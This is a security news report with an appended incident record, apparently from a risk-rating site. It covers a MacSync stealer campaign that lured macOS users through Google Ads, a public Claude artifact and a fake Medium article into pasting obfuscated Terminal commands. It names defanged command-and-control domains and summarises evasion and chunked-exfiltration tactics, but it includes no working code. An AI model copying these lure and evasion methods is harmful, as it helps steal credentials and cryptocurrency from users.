Sophisticated macOS Malware Campaign Exploits Google Ads, Claude AI, and Medium to Distribute MacSync Stealer
A recent malware campaign is targeting macOS users through a multi-pronged attack leveraging sponsored Google search results, Claude AI’s public artifact feature, and fraudulent Medium articles. The operation, uncovered by cybersecurity researchers at Moonlock Lab, has exposed over 15,000 users to the MacSync information stealer, which siphons sensitive data including keychain credentials, browser data, and cryptocurrency wallets.
The campaign employs two distinct variants, both using the ClickFix social engineering technique to deceive users into executing malicious commands.
First Variant: Fake DNS Resolver via Claude AI
When users search for "Online DNS resolver" on Google, a sponsored result directs them to a public Claude AI artifact titled "macOS Secure Command Execution." The fake guide masquerades as a legitimate security tool, instructing victims to paste a base64-encoded command into their Terminal. Upon execution, the command downloads a loader for MacSync from /tmp/osalogging.zip, which then establishes communication with a command-and-control (C2) server at a2abotnet[.]com/dynamic.
The malware uses a hardcoded authentication token and API key, spoofs a macOS browser User-Agent string to evade detection, and exfiltrates stolen data via Apple’s osascript utility. Larger datasets are uploaded in chunks with retry mechanisms and exponential backoff to ensure successful transmission. After exfiltration, the malware deletes staging files to cover its tracks.
Second Variant: Fake Disk Space Analyzer via Medium
A second attack vector targets users searching for "macOS CLI disk space analyzer" through a fraudulent Medium article hosted at apple-mac-disk-space.medium[.]com. The article impersonates Apple’s official Support Team and delivers a similar ClickFix payload with additional obfuscation, including string concatenation tricks (e.g., cur””l) to bypass detection. The malicious payload is fetched from raxelpak[.]com.
Evasion Tactics and Broader Implications
The threat actors behind this campaign demonstrate a deep understanding of social engineering and evasion techniques, exploiting trusted platforms like Google Ads, Claude AI, and Medium to lend legitimacy to their attacks. By abusing these services, they bypass traditional security controls and reach a broader audience.
The MacSync stealer remains a persistent threat, with its operators continuously refining their methods to avoid detection while maximizing data theft. The campaign underscores the growing trend of malware distributors leveraging legitimate services to propagate malicious payloads.
Source: https://cyberpress.org/malicious-campaign-uses-claude-artifacts-and-google-ads/
Anthropic TPRM report: https://www.rankiteo.com/company/anthropicresearch
Google TPRM report: https://www.rankiteo.com/company/google-ads-
Medium TPRM report: https://www.rankiteo.com/company/medium-com
Apple TPRM report: https://www.rankiteo.com/company/apple
"id": "antgooappmed1771064819",
"linkid": "anthropicresearch, google-ads-, apple, medium-com",
"type": "Cyber Attack",
"date": "2/2026",
"severity": "85",
"impact": "4",
"explanation": "Attack with significant impact with customers data leaks"{'affected_entities': [{'customers_affected': '15,000+',
'type': 'Individual Users'}],
'attack_vector': ['Google Ads',
'Claude AI Public Artifact',
'Fraudulent Medium Articles'],
'data_breach': {'data_exfiltration': True,
'number_of_records_exposed': '15,000+',
'personally_identifiable_information': True,
'sensitivity_of_data': 'High',
'type_of_data_compromised': ['Keychain credentials',
'Browser data',
'Cryptocurrency wallets']},
'description': 'A recent malware campaign is targeting macOS users through a '
'multi-pronged attack leveraging sponsored Google search '
'results, Claude AI’s public artifact feature, and fraudulent '
'Medium articles. The operation has exposed over 15,000 users '
'to the MacSync information stealer, which siphons sensitive '
'data including keychain credentials, browser data, and '
'cryptocurrency wallets. The campaign employs two distinct '
'variants, both using the ClickFix social engineering '
'technique to deceive users into executing malicious commands.',
'impact': {'data_compromised': 'Keychain credentials, browser data, '
'cryptocurrency wallets',
'identity_theft_risk': 'High',
'payment_information_risk': 'High',
'systems_affected': 'macOS systems'},
'initial_access_broker': {'entry_point': ['Google Ads',
'Claude AI Public Artifact',
'Fraudulent Medium Articles']},
'lessons_learned': 'The campaign underscores the growing trend of malware '
'distributors leveraging legitimate services (Google Ads, '
'Claude AI, Medium) to propagate malicious payloads and '
'bypass traditional security controls.',
'motivation': 'Data Theft',
'post_incident_analysis': {'root_causes': 'Exploitation of trusted platforms '
'(Google Ads, Claude AI, Medium) '
'for social engineering and malware '
'distribution.'},
'ransomware': {'data_exfiltration': True},
'references': [{'source': 'Moonlock Lab'}],
'response': {'third_party_assistance': 'Moonlock Lab (Cybersecurity '
'Researchers)'},
'title': 'Sophisticated macOS Malware Campaign Exploits Google Ads, Claude '
'AI, and Medium to Distribute MacSync Stealer',
'type': 'Malware Campaign',
'vulnerability_exploited': 'Social Engineering (ClickFix technique)'}